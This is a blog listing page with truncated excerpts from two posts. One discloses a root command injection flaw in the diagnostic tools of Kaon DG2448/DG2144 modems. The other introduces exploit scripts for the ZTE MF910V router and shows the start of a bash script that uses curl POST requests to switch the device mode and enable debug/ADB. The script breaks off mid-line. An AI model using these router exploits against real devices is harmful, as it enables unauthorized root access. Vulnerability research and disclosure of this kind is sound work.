Posts

Showing posts from 2024

Kaon DG2144 Exploit: Root Command Injection (& How To Enable SSH)

Command Injection Vulnerability in Kaon DG2448 & DG2144 Modems

Published on 7/30/24 3:17 PM

Introduction

In this post, I’ll be sharing my findings on a critical command injection vulnerability I discovered in the Kaon DG2448 and Kaon DG2144 modems. The vulnerability is a severe flaw that allows attackers to execute arbitrary commands with root privileges through the modems' web interface. I will explain the details of how the exploit works, the potential impact, and how users and organizations can protect themselves.

The Vulnerability Overview

Upon analyzing the modems’ web service, I found that several diagnostic functions are vulnerable to command injection. These functions include:

Ping (under Diagnostics Tab)
Traceroute (under Diagnostics Tab)
NsLookup (under Diagn...

Telstra ZteMF910/v Exploit Scripts

To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.

Mode Switching and Enabling ADB

To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:

    #!/bin/bash
    # Mode Switching
    MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
    MODE_SWITCH_VALUE="1" # Change X to 0 or 1
    curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" $MODE_SWITCH_URL
    # Enabling ADB
    ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_pr...